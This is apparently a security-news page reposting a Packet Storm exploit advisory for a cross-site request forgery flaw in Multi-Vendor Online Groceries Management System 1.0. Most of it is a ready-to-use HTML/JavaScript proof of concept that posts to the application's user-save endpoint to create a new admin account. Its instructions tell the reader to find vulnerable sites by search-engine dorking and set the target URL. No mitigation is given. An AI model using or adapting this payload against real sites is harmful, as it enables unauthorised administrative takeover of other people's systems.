Security
Headlines
HeadlinesLatestCVEs

Headline

Multi-Vendor Online Groceries Management System 1.0 Cross Site Request Forgery

Multi-Vendor Online Groceries Management System version 1.0 suffers from a cross site request forgery vulnerability.

Packet Storm
#csrf#vulnerability#windows#google#php#auth#firefox

=============================================================================================================================================
| # Title : Multi-Vendor Online Groceries Management System 1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/mvogms_2.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This payload add new admin user .

[+] save payload as poc.html

[+] line 27 Set your target url

[+] payload :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>User Registration</title>
</head>
<body>

<h2>User Registration</h2>  
<form id="userForm" enctype="multipart/form-data">  
    <label for="username">Username:</label>  
    <input type="text" id="username" name="username" required><br><br>

    <label for="password">Password:</label>  
    <input type="password" id="password" name="password" required><br><br>

    <input type="button" value="Save User" onclick="saveUser()">  
</form>

<script>  
    function saveUser() {  
        var form = document.getElementById('userForm');  
        var formData = new FormData(form);

        var xhr = new XMLHttpRequest();  
        xhr.open("POST", "http://localhost/mvogms/classes/Users.php?f=save", true);

        xhr.onload = function () {  
            if (xhr.status === 200) {  
                alert('User saved successfully');  
            } else {  
                alert('An error occurred while saving the user');  
            }  
        };

        xhr.send(formData);  
    }  
</script>

</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution